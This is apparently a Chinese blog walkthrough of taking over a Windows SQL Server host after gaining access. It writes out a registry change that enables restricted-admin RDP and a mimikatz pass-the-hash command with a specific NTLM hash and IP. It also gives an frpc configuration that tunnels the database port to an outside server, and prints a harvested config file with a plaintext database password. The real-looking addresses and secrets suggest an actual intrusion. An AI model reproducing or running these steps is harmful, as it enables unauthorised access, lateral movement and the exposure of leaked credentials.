chcp 65001
如下msf就不会出现乱码
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/db1ff93081914bbb2f1cf7bcaeb60f86.png)
使用test连接上去了，可惜不能直接打开sqlserver
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/346ff840d08b19bb62155edeb3200829.png)
两个想法
一：hash传递登录到admin
二：上传免杀的frpc上去，将目标1433端口代理出来，使用navicat连接


### 一：hash传递登录到admin
#### 修改目标注册表，开启hash传递
```
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/9b1528b8087c5f33f8a0d7d4cd17bf61.png)
```
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/992047dc29f885b2fed2301156ee3cd9.png)
#### 利用 mimikatz  输入下面命令
```
privilege::debug

sekurlsa::pth /user:administrator /domain:47.97.90.1 /ntlm:d23ac23671cda20a435ee35fd48464a8 "/run:mstsc.exe /restrictedadmin"
```
### ![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/e7b1245919112f6b481f76c07d4dc9ba.png)
成功登录
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/79aa8ccb2c54f8f2cdde77ffdc7a1847.png)
### 二：上传免杀的frpc上去，将目标1433端口代理出来，使用navicat连接
#### frpc配置如下
```
[common]
server_addr = 172.245.17.142
server_port = 8008
token = SCJTxrVIJZWcfiND

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 1433
remote_port = 1433
```
将目标数据库代理出来，配合从账号密码使用navicat连接
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/754f95ea92bb6cb568706401704c965c.png)


#从config网站配置文件中翻到数据库密码
```
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
    </configSections>
    <connectionStrings>
        <add name="WeiXinAdminForm.Properties.Settings.WeiXinAdminConnectionString"
            connectionString="Data Source=.;Initial Catalog=WeiXinAdmin;Persist Security Info=True;User ID=changex;Password=Wzl880626..."
            providerName="System.Data.SqlClient" />
    </connectionStrings>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
    </startup>
</configuration>
```


> 如果一个男人懦弱逃避/没有主见（主体认知全是外部规则灌输的结果）/从众。 我想他 
> 一辈子都没有被善待/培养过。 所有人都知道对于一个雄性，这种状态约等于报废了，不 管怎么主观合理化都无法改变这个客观现实。 但是我很同情他，因为我知道，只有最恶毒 的改造，才会产生最悲催的结局。   --每日一句